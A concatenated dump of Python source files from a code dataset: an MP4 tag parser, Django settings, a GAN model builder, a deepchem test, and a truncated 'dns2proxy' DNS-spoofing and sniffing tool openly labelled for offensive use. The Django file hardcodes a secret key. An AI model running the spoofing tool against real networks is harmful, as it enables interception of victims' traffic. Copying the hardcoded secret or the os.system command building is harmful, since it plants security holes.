``\"mp4a.40.2\"``, ``\"ac-3\"`` etc.\n * codec_description (string):\n Name of the codec used (ALAC, AAC LC, AC-3...). 
Values might change in\n the future, use for display purposes only.\n \"\"\"\n\n bitrate = 0\n channels = 0\n sample_rate = 0\n bits_per_sample = 0\n codec = u\"\"\n codec_name = u\"\"\n\n def __init__(self, atoms, fileobj):\n try:\n moov = atoms[b\"moov\"]\n except KeyError:\n raise MP4StreamInfoError(\"not a MP4 file\")\n\n for trak in moov.findall(b\"trak\"):\n hdlr = trak[b\"mdia\", b\"hdlr\"]\n ok, data = hdlr.read(fileobj)\n if not ok:\n raise MP4StreamInfoError(\"Not enough data\")\n if data[8:12] == b\"soun\":\n break\n else:\n raise MP4StreamInfoError(\"track has no audio data\")\n\n mdhd = trak[b\"mdia\", b\"mdhd\"]\n ok, data = mdhd.read(fileobj)\n if not ok:\n raise MP4StreamInfoError(\"Not enough data\")\n\n try:\n version, flags, data = parse_full_atom(data)\n except ValueError as e:\n raise MP4StreamInfoError(e)\n\n if version == 0:\n offset = 8\n fmt = \">2I\"\n elif version == 1:\n offset = 16\n fmt = \">IQ\"\n else:\n raise MP4StreamInfoError(\"Unknown mdhd version %d\" % version)\n\n end = offset + struct.calcsize(fmt)\n unit, length = struct.unpack(fmt, data[offset:end])\n try:\n self.length = float(length) / unit\n except ZeroDivisionError:\n self.length = 0\n\n try:\n atom = trak[b\"mdia\", b\"minf\", b\"stbl\", b\"stsd\"]\n except KeyError:\n pass\n else:\n self._parse_stsd(atom, fileobj)\n\n def _parse_stsd(self, atom, fileobj):\n \"\"\"Sets channels, bits_per_sample, sample_rate and optionally bitrate.\n\n Can raise MP4StreamInfoError.\n \"\"\"\n\n assert atom.name == b\"stsd\"\n\n ok, data = atom.read(fileobj)\n if not ok:\n raise MP4StreamInfoError(\"Invalid stsd\")\n\n try:\n version, flags, data = parse_full_atom(data)\n except ValueError as e:\n raise MP4StreamInfoError(e)\n\n if version != 0:\n raise MP4StreamInfoError(\"Unsupported stsd version\")\n\n try:\n num_entries, offset = cdata.uint32_be_from(data, 0)\n except cdata.error as e:\n raise MP4StreamInfoError(e)\n\n if num_entries == 0:\n return\n\n # look at the first entry if there is one\n entry_fileobj = cBytesIO(data[offset:])\n try:\n entry_atom = Atom(entry_fileobj)\n except AtomError as e:\n raise MP4StreamInfoError(e)\n\n try:\n entry = AudioSampleEntry(entry_atom, entry_fileobj)\n except ASEntryError as e:\n raise MP4StreamInfoError(e)\n else:\n self.channels = entry.channels\n self.bits_per_sample = entry.sample_size\n self.sample_rate = entry.sample_rate\n self.bitrate = entry.bitrate\n self.codec = entry.codec\n self.codec_description = entry.codec_description\n\n def pprint(self):\n return \"MPEG-4 audio (%s), %.2f seconds, %d bps\" % (\n self.codec_description, self.length, self.bitrate)\n\n\nclass MP4(FileType):\n \"\"\"An MPEG-4 audio file, probably containing AAC.\n\n If more than one track is present in the file, the first is used.\n Only audio ('soun') tracks will be read.\n\n :ivar info: :class:`MP4Info`\n :ivar tags: :class:`MP4Tags`\n \"\"\"\n\n MP4Tags = MP4Tags\n\n _mimes = [\"audio/mp4\", \"audio/x-m4a\", \"audio/mpeg4\", \"audio/aac\"]\n\n def load(self, filename):\n self.filename = filename\n with open(filename, \"rb\") as fileobj:\n try:\n atoms = Atoms(fileobj)\n except AtomError as err:\n reraise(error, err, sys.exc_info()[2])\n\n try:\n self.info = MP4Info(atoms, fileobj)\n except error:\n raise\n except Exception as err:\n reraise(MP4StreamInfoError, err, sys.exc_info()[2])\n\n if not MP4Tags._can_load(atoms):\n self.tags = None\n else:\n try:\n self.tags = self.MP4Tags(atoms, fileobj)\n except error:\n raise\n except Exception as err:\n reraise(MP4MetadataError, err, 
sys.exc_info()[2])\n\n def add_tags(self):\n if self.tags is None:\n self.tags = self.MP4Tags()\n else:\n raise error(\"an MP4 tag already exists\")\n\n @staticmethod\n def score(filename, fileobj, header_data):\n return (b\"ftyp\" in header_data) + (b\"mp4\" in header_data)\n\n\nOpen = MP4\n\n\ndef delete(filename):\n \"\"\"Remove tags from a file.\"\"\"\n\n MP4(filename).delete()\n\nclass MediaKind:\n MUSIC = [1]\n AUDIO_BOOK = [2]\n MUSIC_VIDEO = [6]\n MOVIE = [9]\n TV_SHOW = [10]\n BOOKLET = [11]\n RINGTONE = [14]\n\nclass HDVideo:\n STANDARD = [0]\n P720 = [1]\n P1080 = [2]\n\nclass ContentRating:\n NONE = [0]\n CLEAN = [2]\n EXPLICIT = [4]\n"} {"ext": "py", "sha": "1a30383081f520f321035a843ac38a723ccdbdd5", "content": "\"\"\"\nDjango settings for lofiback project.\n\nGenerated by 'django-admin startproject' using Django 2.0.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.0/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.0/ref/settings/\n\"\"\"\n\nimport os\n\n#Права на загруженные файлы\nFILE_UPLOAD_PERMISSIONS = 0o644\n\nCORS_ORIGIN_WHITELIST = (\n 'localhost:3000',\n '127.0.0.1:3000',\n '.lofichan.ru',\n 'api.lofichan.ru',\n 'lofichan.ru',\n)\n\nCORS_ALLOW_METHODS = (\n 'DELETE',\n 'GET',\n 'OPTIONS',\n 'PATCH',\n 'POST',\n 'PUT',\n)\n\nCORS_ALLOW_CREDENTIALS = True\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': 'error.log',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n },\n}\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '*(qi2^67--t7g^b#4@amwxlpmawg2a@o^^6zm@pyhvui$44r!$'\n#\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = os.environ.get('S_DEBUG')\n\nALLOWED_HOSTS = ['127.0.0.1', 'localhost', '.lofichan.ru', 'api.lofichan.ru', 'lofichan.ru', 'st.lofichan.ru']\nCORS_ORIGIN_ALLOW_ALL = True\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'rest_framework',\n 'corsheaders',\n 'api',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'lofiback.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 
'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'lofiback.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/2.0/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': os.environ.get('DB_NAME_L'),\n 'USER': os.environ.get('DB_USER'),\n 'PASSWORD': os.environ.get('DB_PASSWORD'),\n 'HOST': os.environ.get('DB_HOST'),\n 'PORT': os.environ.get('DB_PORT')\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.0/topics/i18n/\n\nLANGUAGE_CODE = 'ru-ru'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.0/howto/static-files/\nPROJECT_DIR = os.path.dirname(os.path.abspath(__file__))\nSTATIC_ROOT = os.path.join(PROJECT_DIR, 'templates')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"templates\")\n]\n"} {"ext": "py", "sha": "1a3038d94c2a4ee31ee03541ef314aa0d483e6c9", "content": "# python3.7\n\"\"\"Collects all available models together.\"\"\"\n\nfrom .model_zoo import MODEL_ZOO\nfrom .pggan_generator import PGGANGenerator\nfrom .pggan_discriminator import PGGANDiscriminator\nfrom .stylegan_generator import StyleGANGenerator\nfrom .stylegan_discriminator import StyleGANDiscriminator\nfrom .stylegan2_generator import StyleGAN2Generator\nfrom .stylegan2_discriminator import StyleGAN2Discriminator\nfrom .stylegan2_gs_generator import StyleGAN2_GS_Generator\n# from op import FusedLeakyReLU, fused_leaky_relu, upfirdn2d\n\n__all__ = [\n 'MODEL_ZOO', 'PGGANGenerator', 'PGGANDiscriminator', 'StyleGANGenerator',\n 'StyleGANDiscriminator', 'StyleGAN2Generator', 'StyleGAN2Discriminator',\n 'StyleGAN2_GS_Generator', 'build_generator', 'build_discriminator', 'build_model', \n]\n\n_GAN_TYPES_ALLOWED = ['pggan', 'stylegan', 'stylegan2', 'stylegan2_gs']\n_MODULES_ALLOWED = ['generator', 'discriminator']\n\n\ndef build_generator(gan_type, resolution, **kwargs):\n \"\"\"Builds generator by GAN type.\n\n Args:\n gan_type: GAN type to which the generator belong.\n resolution: Synthesis resolution.\n **kwargs: Additional arguments to build the generator.\n\n Raises:\n ValueError: If the `gan_type` is not supported.\n NotImplementedError: If the `gan_type` is not implemented.\n \"\"\"\n if gan_type not in _GAN_TYPES_ALLOWED:\n raise ValueError(f'Invalid GAN type: `{gan_type}`!\\n'\n f'Types allowed: {_GAN_TYPES_ALLOWED}.')\n\n if gan_type == 'pggan':\n return PGGANGenerator(resolution, **kwargs)\n if gan_type == 'stylegan':\n return StyleGANGenerator(resolution, **kwargs)\n if gan_type == 'stylegan2':\n return StyleGAN2Generator(resolution, **kwargs)\n if gan_type == 'stylegan2_gs':\n return StyleGAN2_GS_Generator(resolution, **kwargs)\n raise NotImplementedError(f'Unsupported GAN type `{gan_type}`!')\n\n\ndef build_discriminator(gan_type, resolution, **kwargs):\n \"\"\"Builds discriminator by GAN type.\n\n Args:\n gan_type: GAN type to which the discriminator 
belong.\n resolution: Synthesis resolution.\n **kwargs: Additional arguments to build the discriminator.\n\n Raises:\n ValueError: If the `gan_type` is not supported.\n NotImplementedError: If the `gan_type` is not implemented.\n \"\"\"\n if gan_type not in _GAN_TYPES_ALLOWED:\n raise ValueError(f'Invalid GAN type: `{gan_type}`!\\n'\n f'Types allowed: {_GAN_TYPES_ALLOWED}.')\n\n if gan_type == 'pggan':\n return PGGANDiscriminator(resolution, **kwargs)\n if gan_type == 'stylegan':\n return StyleGANDiscriminator(resolution, **kwargs)\n if gan_type == 'stylegan2':\n return StyleGAN2Discriminator(resolution, **kwargs)\n raise NotImplementedError(f'Unsupported GAN type `{gan_type}`!')\n\n\ndef build_model(gan_type, module, resolution, **kwargs):\n \"\"\"Builds a GAN module (generator/discriminator/etc).\n\n Args:\n gan_type: GAN type to which the model belong.\n module: GAN module to build, such as generator or discrimiantor.\n resolution: Synthesis resolution.\n **kwargs: Additional arguments to build the discriminator.\n\n Raises:\n ValueError: If the `module` is not supported.\n NotImplementedError: If the `module` is not implemented.\n \"\"\"\n if module not in _MODULES_ALLOWED:\n raise ValueError(f'Invalid module: `{module}`!\\n'\n f'Modules allowed: {_MODULES_ALLOWED}.')\n\n if module == 'generator':\n return build_generator(gan_type, resolution, **kwargs)\n if module == 'discriminator':\n return build_discriminator(gan_type, resolution, **kwargs)\n raise NotImplementedError(f'Unsupported module `{module}`!')\n\n\ndef parse_gan_type(module):\n \"\"\"Parses GAN type of a given module.\n\n Args:\n module: The module to parse GAN type from.\n\n Returns:\n A string, indicating the GAN type.\n\n Raises:\n ValueError: If the GAN type is unknown.\n \"\"\"\n if isinstance(module, (PGGANGenerator, PGGANDiscriminator)):\n return 'pggan'\n if isinstance(module, (StyleGANGenerator, StyleGANDiscriminator)):\n return 'stylegan'\n if isinstance(module, (StyleGAN2Generator, StyleGAN2Discriminator)):\n return 'stylegan2'\n if isinstance(module, (StyleGAN2_GS_Generator, StyleGAN2Discriminator)):\n return 'stylegan2_gs'\n raise ValueError(f'Unable to parse GAN type from type `{type(module)}`!')\n"} {"ext": "py", "sha": "1a3038fb7ec02caeb8de6f54fa19c0c5fe51e69c", "content": "import os\nimport unittest\nimport numpy as np\nfrom deepchem.utils import rdkit_util\nfrom deepchem.utils.fragment_util import get_contact_atom_indices\nfrom deepchem.utils.fragment_util import merge_molecular_fragments\nfrom deepchem.utils.fragment_util import get_partial_charge\nfrom deepchem.utils.fragment_util import strip_hydrogens\nfrom deepchem.utils.fragment_util import MolecularFragment\nfrom deepchem.utils.fragment_util import AtomShim\n\n\nclass TestFragmentUtil(unittest.TestCase):\n\n def setUp(self):\n # TODO test more formats for ligand\n current_dir = os.path.dirname(os.path.realpath(__file__))\n self.protein_file = os.path.join(\n current_dir, '../../feat/tests/data/3ws9_protein_fixer_rdkit.pdb')\n self.ligand_file = os.path.join(current_dir,\n '../../feat/tests/data/3ws9_ligand.sdf')\n\n def test_get_contact_atom_indices(self):\n complexes = rdkit_util.load_complex([self.protein_file, self.ligand_file])\n contact_indices = get_contact_atom_indices(complexes)\n assert len(contact_indices) == 2\n\n def test_create_molecular_fragment(self):\n mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)\n fragment = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)\n assert len(mol_rdk.GetAtoms()) == 
len(fragment.GetAtoms())\n assert (fragment.GetCoords() == mol_xyz).all()\n\n def test_strip_hydrogens(self):\n mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)\n fragment = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)\n\n # Test on RDKit\n frag = strip_hydrogens(mol_xyz, mol_rdk)\n\n def test_merge_molecular_fragments(self):\n mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)\n fragment1 = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)\n fragment2 = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)\n joint = merge_molecular_fragments([fragment1, fragment2])\n assert len(mol_rdk.GetAtoms()) * 2 == len(joint.GetAtoms())\n\n def test_get_partial_charge(self):\n from rdkit import Chem\n mol = Chem.MolFromSmiles(\"CC\")\n atom = mol.GetAtoms()[0]\n partial_charge = get_partial_charge(atom)\n assert partial_charge == 0\n\n def test_atom_shim(self):\n atomic_num = 5\n partial_charge = 1\n atom_coords = np.array([0., 1., 2.])\n shim = AtomShim(atomic_num, partial_charge, atom_coords)\n assert shim.GetAtomicNum() == atomic_num\n assert shim.GetPartialCharge() == partial_charge\n assert (shim.GetCoords() == atom_coords).all()\n"} {"ext": "py", "sha": "1a303993436f86b3ec594b86e83d431455b50013", "content": "#!/usr/bin/python2.6\n'''\ndns2proxy for offensive cybersecurity v1.0\n\n\npython dns2proxy.py -h for Usage.\n\nExample:\npython2.6 dns2proxy.py -i eth0 -u 192.168.1.101 -d 192.168.1.200\n\nExample for no forwarding (only configured domain based queries and spoofed hosts):\n python2.6 dns2proxy.py -i eth0 -noforward\n\nExample for no forwarding but add IPs\n python dns2proxy.py -i eth0 -I 192.168.1.101,90.1.1.1,155.54.1.1 -noforward\n\nAuthor: Leonardo Nve ( leonardo.nve@gmail.com)\n'''\n\n\nimport dns.message\nimport dns.rrset\nimport dns.resolver\nimport socket\nimport numbers\nimport threading\nfrom struct import *\nimport datetime\nimport pcapy\nimport os\nimport signal\nimport errno\nfrom time import sleep\nimport argparse\n\n\nconsultas = {}\nspoof = {}\ndominios = {}\nnospoof = []\nnospoofto = []\nvictims = []\n\nLOGREQFILE = \"dnslog.txt\"\nLOGSNIFFFILE = \"snifflog.txt\"\nLOGALERTFILE = \"dnsalert.txt\"\nRESOLVCONF = \"resolv.conf\"\n\nvictim_file = \"victims.cfg\"\nnospoof_file = \"nospoof.cfg\"\nnospoofto_file = \"nospoofto.cfg\"\nspecific_file = \"spoof.cfg\"\ndominios_file = \"domains.cfg\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-N\", \"--noforward\", help=\"DNS Fowarding OFF (default ON)\", action=\"store_true\")\nparser.add_argument(\"-i\", \"--interface\", help=\"Interface to use\", default=\"eth0\")\nparser.add_argument(\"-u\", \"--ip1\", help=\"First IP to add at the response\", default=None)\nparser.add_argument(\"-d\", \"--ip2\", help=\"Second IP to add at the response\", default=None)\nparser.add_argument(\"-I\", \"--ips\", help=\"List of IPs to add after ip1,ip2 separated with commas\", default=None)\nparser.add_argument(\"-S\", \"--silent\", help=\"Silent mode\", action=\"store_true\")\nparser.add_argument(\"-A\", \"--adminIP\", help=\"Administrator IP for no filtering\", default=\"192.168.0.1\")\n\nargs = parser.parse_args()\n\ndebug = not args.silent\ndev = args.interface\nadminip = args.adminIP\nip1 = args.ip1\nip2 = args.ip2\nForward = not args.noforward\n\nfake_ips = []\n# List of of ips\nif args.ips is not None:\n for ip in args.ips.split(\",\"):\n fake_ips.append(ip)\n\nResolver = dns.resolver.Resolver()\n\n######################\n# GENERAL SECTION #\n######################\n\n\ndef save_req(lfile, str):\n f = open(lfile, 
\"a\")\n f.write(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") + ' ' + str)\n f.close()\n\n\ndef SIGUSR1_handle(signalnum, frame):\n global noserv\n global Resolver\n noserv = 0\n DEBUGLOG('Reconfiguring....')\n process_files()\n Resolver.reset()\n Resolver.read_resolv_conf(RESOLVCONF)\n return\n\n\ndef process_files():\n global nospoof\n global spoof\n global nospoof_file\n global specific_file\n global dominios_file\n global dominios\n global nospoofto_file\n\n for i in nospoof[:]:\n nospoof.remove(i)\n\n for i in nospoofto[:]:\n nospoofto.remove(i)\n\n for i in victims[:]:\n victims.remove(i)\n\n dominios.clear()\n spoof.clear()\n\n nsfile = open(nospoof_file, 'r')\n for line in nsfile:\n if line[0] == '#':\n continue\n h = line.split()\n if len(h) > 0:\n DEBUGLOG('Non spoofing ' + h[0])\n nospoof.append(h[0])\n\n nsfile.close()\n\n nsfile = open(victim_file, 'r')\n for line in nsfile:\n if line[0] == '#':\n continue\n h = line.split()\n if len(h) > 0:\n DEBUGLOG('Spoofing only to ' + h[0])\n victims.append(h[0])\n\n nsfile.close()\n\n nsfile = open(nospoofto_file, 'r')\n for line in nsfile:\n if line[0] == '#':\n continue\n h = line.split()\n if len(h) > 0:\n DEBUGLOG('Non spoofing to ' + h[0])\n nospoofto.append(h[0])\n\n nsfile.close()\n\n nsfile = open(specific_file, 'r')\n for line in nsfile:\n if line[0] == '#':\n continue\n h = line.split()\n if len(h) > 1:\n DEBUGLOG('Specific host spoofing ' + h[0] + ' with ' + h[1])\n spoof[h[0]] = h[1]\n\n nsfile.close()\n nsfile = open(dominios_file, 'r')\n for line in nsfile:\n if line[0] == '#':\n continue\n h = line.split()\n if len(h) > 1:\n DEBUGLOG('Specific domain IP ' + h[0] + ' with ' + h[1])\n dominios[h[0]] = h[1]\n\n nsfile.close()\n return\n\n\ndef DEBUGLOG(str):\n global debug\n if debug:\n print str\n return\n\n\ndef handler_msg(id):\n os.popen('./handler_msg.sh %s >> handler_msg.log 2>> handler_msg_error.log &'%id.replace('`','_').replace(';','_').replace('|','_').replace('&','_'))\n return\n\n######################\n# SNIFFER SECTION #\n######################\n\nclass ThreadSniffer(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n #DEBUGLOG( self.getName(), \" Sniffer Waiting connections....\")\n go()\n\ndef go():\n global ip1\n global dev\n bpffilter = \"dst host %s and not src host %s and !(tcp dst port 80 or tcp dst port 443) and (not host %s)\" % (\n ip1, ip1, adminip)\n cap = pcapy.open_live(dev, 255, 1, 0)\n cap.setfilter(bpffilter)\n DEBUGLOG( \"Starting sniffing in (%s = %s)....\" % (dev, ip1))\n\n #start sniffing packets\n while True:\n try:\n (header, packet) = cap.next()\n parse_packet(packet)\n except:\n pass\n #DEBUGLOG( ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen())))\n\n#function to parse a packet\ndef parse_packet(packet):\n eth_length = 14\n eth_protocol = 8\n global ip1\n global consultas\n global ip2\n\n #Parse IP packets, IP Protocol number = 8\n if eth_protocol == 8:\n #Parse IP header\n #take first 20 characters for the ip header\n ip_header = packet[eth_length:20 + eth_length]\n\n #now unpack them :)\n iph = unpack('!BBHHHBBH4s4s', ip_header)\n\n version_ihl = iph[0]\n #version = version_ihl >> 4\n ihl = version_ihl & 0xF\n\n iph_length = ihl * 4\n\n #ttl = iph[5]\n protocol = iph[6]\n s_addr = socket.inet_ntoa(iph[8])\n d_addr = socket.inet_ntoa(iph[9])\n\n\n\n #TCP protocol\n if protocol == 6:\n t = iph_length + eth_length\n tcp_header = packet[t:t + 20]\n\n #now unpack them :)\n 
tcph = unpack('!HHLLBBHHH', tcp_header)\n\n source_port = tcph[0]\n dest_port = tcph[1]\n # sequence = tcph[2]\n # acknowledgement = tcph[3]\n # doff_reserved = tcph[4]\n # tcph_length = doff_reserved >> 4\n\n\n\n if consultas.has_key(str(s_addr)):\n DEBUGLOG(' ==> Source Address : ' + str(s_addr) + ' * Destination Address : ' + str(d_addr))\n DEBUGLOG(' Source Port : ' + str(source_port) + ' * Dest Port : ' + str(dest_port))\n # \tprint '>>>> '+str(s_addr)+' esta en la lista!!!!.....'\n comando = 'sh ./IPBouncer.sh %s %s %s %s' % (\n ip2, str(dest_port), consultas[str(s_addr)], str(dest_port))\n os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))\n #print '>>>> ' + comando\n comando = '/sbin/iptables -D INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (\n ip1, str(dest_port), str(s_addr), str(source_port))\n os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))\n comando = '/sbin/iptables -A INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (\n ip1, str(dest_port), str(s_addr), str(source_port))\n os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))\n #print '>>>> ' + comando\n\n #UDP packets\n elif protocol == 17:\n u = iph_length + eth_length\n #udph_length = 8\n #udp_header = packet[u:u + 8]\n #now unpack them :)\n #udph = unpack('!HHHH', udp_header)\n #source_port = udph[0]\n #dest_port = udph[1]\n #length = udph[2]\n #checksum = udph[3]\n #DEBUGLOG('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum))\n #h_size = eth_length + iph_length + udph_length\n #data_size = len(packet) - h_size\n #get data from the packet\n #data = packet[h_size:]\n\n\n######################\n# DNS SECTION #\n######################\n\ndef respuestas(name, type):\n global Resolver\n\n DEBUGLOG('Query = ' + name + ' ' + type)\n try:\n answers = Resolver.query(name, type)\n except Exception, e:\n DEBUGLOG('Exception...')\n return 0\n return answers\n\n\ndef requestHandler(address, message):\n resp = None\n dosleep = False\n try:\n message_id = ord(message[0]) * 256 + ord(message[1])\n DEBUGLOG('msg id = ' + str(message_id))\n if message_id in serving_ids:\n DEBUGLOG('I am already serving this request.')\n return\n serving_ids.append(message_id)\n DEBUGLOG('Client IP: ' + address[0])\n prov_ip = address[0]\n try:\n msg = dns.message.from_wire(message)\n try:\n op = msg.opcode()\n if op == 0:\n # standard and inverse query\n qs = msg.question\n if len(qs) > 0:\n q = qs[0]\n DEBUGLOG('request is ' + str(q))\n save_req(LOGREQFILE, 'Client IP: ' + address[0] + ' request is ' + str(q) + '\\n')\n if q.rdtype == dns.rdatatype.A:\n DEBUGLOG('Doing the A query....')\n resp, dosleep = std_A_qry(msg, prov_ip)\n elif q.rdtype == dns.rdatatype.PTR:\n #DEBUGLOG('Doing the PTR query....')\n resp = std_PTR_qry(msg)\n elif q.rdtype == dns.rdatatype.MX:\n DEBUGLOG('Doing the MX query....')\n resp = std_MX_qry(msg)\n elif q.rdtype == dns.rdatatype.TXT:\n #DEBUGLOG('Doing the TXT query....')\n resp = std_TXT_qry(msg)\n elif q.rdtype == dns.rdatatype.AAAA:\n #DEBUGLOG('Doing the AAAA query....')\n resp = std_AAAA_qry(msg)\n else:\n # not implemented\n resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented\n else:\n # not implemented\n resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented\n\n except Exception, e:\n DEBUGLOG('got ' + repr(e))\n resp = 
make_response(qry=msg, RCODE=2) # RCODE = 2 Server Error\n DEBUGLOG('resp = ' + repr(resp.to_wire()))\n except Exception, e:\n DEBUGLOG('got ' + repr(e))\n resp = make_response(id=message_id, RCODE=1) # RCODE = 1 Format Error\n DEBUGLOG('resp = ' + repr(resp.to_wire()))\n except Exception, e:\n # message was crap, not even the ID\n DEBUGLOG('got ' + repr(e))\n\n if resp:\n s.sendto(resp.to_wire(), address)\n if dosleep: sleep(1) # Performance downgrade no tested jet\n\n\ndef std_PTR_qry(msg):\n qs = msg.question\n DEBUGLOG( str(len(qs)) + ' questions.')\n iparpa = qs[0].to_text().split(' ', 1)[0]\n DEBUGLOG('Host: ' + iparpa)\n resp = make_response(qry=msg)\n hosts = respuestas(iparpa[:-1], 'PTR')\n if isinstance(hosts, numbers.Integral):\n DEBUGLOG('No host....')\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3\tNXDOMAIN\n return resp\n\n for host in hosts:\n DEBUGLOG('Adding ' + host.to_text())\n rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.PTR, host.to_text())\n resp.answer.append(rrset)\n\n return resp\n\n\ndef std_MX_qry(msg):\n qs = msg.question\n DEBUGLOG(str(len(qs)) + ' questions.')\n iparpa = qs[0].to_text().split(' ', 1)[0]\n DEBUGLOG('Host: ' + iparpa)\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3\tNXDOMAIN\n return resp\n #Temporal disable MX responses\n resp = make_response(qry=msg)\n hosts = respuestas(iparpa[:-1], 'MX')\n if isinstance(hosts, numbers.Integral):\n DEBUGLOG('No host....')\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3\tNXDOMAIN\n return resp\n\n for host in hosts:\n DEBUGLOG('Adding ' + host.to_text())\n rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.MX, host.to_text())\n resp.answer.append(rrset)\n\n return resp\n\n\ndef std_TXT_qry(msg):\n qs = msg.question\n print str(len(qs)) + ' questions.'\n iparpa = qs[0].to_text().split(' ', 1)[0]\n print 'Host: ' + iparpa\n resp = make_response(qry=msg)\n\n host = iparpa[:-1]\n punto = host.find(\".\")\n dominio = host[punto:]\n host = \".\"+host\n spfresponse = ''\n if (dominio in dominios) or (host in dominios):\n ttl = 1\n DEBUGLOG('Alert domain! (TXT) ID: ' + host)\n # Here the HANDLE!\n #os.popen(\"python /yowsup/yowsup-cli -c /yowsup/config -s \\\"Host %s\\nIP %s\\\" > /dev/null &\"%(id,prov_ip));\n save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\\n')\n if host in dominios: spfresponse = \"v=spf1 a:mail%s/24 mx -all \"%host\n if dominio in dominios: spfresponse = \"v=spf1 a:mail%s/24 mx -all \"%dominio\n DEBUGLOG('Responding with SPF = ' + spfresponse)\n rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)\n resp.answer.append(rrset)\n return resp\n\n\n hosts = respuestas(iparpa[:-1], 'TXT')\n if isinstance(hosts, numbers.Integral):\n print 'No host....'\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN\n return resp\n\n for host in hosts:\n print 'Adding ' + host.to_text()\n rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.TXT, host.to_text())\n resp.answer.append(rrset)\n\n return resp\n\ndef std_SPF_qry(msg):\n qs = msg.question\n print str(len(qs)) + ' questions.'\n iparpa = qs[0].to_text().split(' ', 1)[0]\n print 'Host: ' + iparpa\n resp = make_response(qry=msg)\n\n # host = iparpa[:-1]\n # punto = host.find(\".\")\n # dominio = host[punto:]\n # host = \".\"+host\n # if (dominio in dominios) or (host in dominios):\n # ttl = 1\n # DEBUGLOG('Alert domain! 
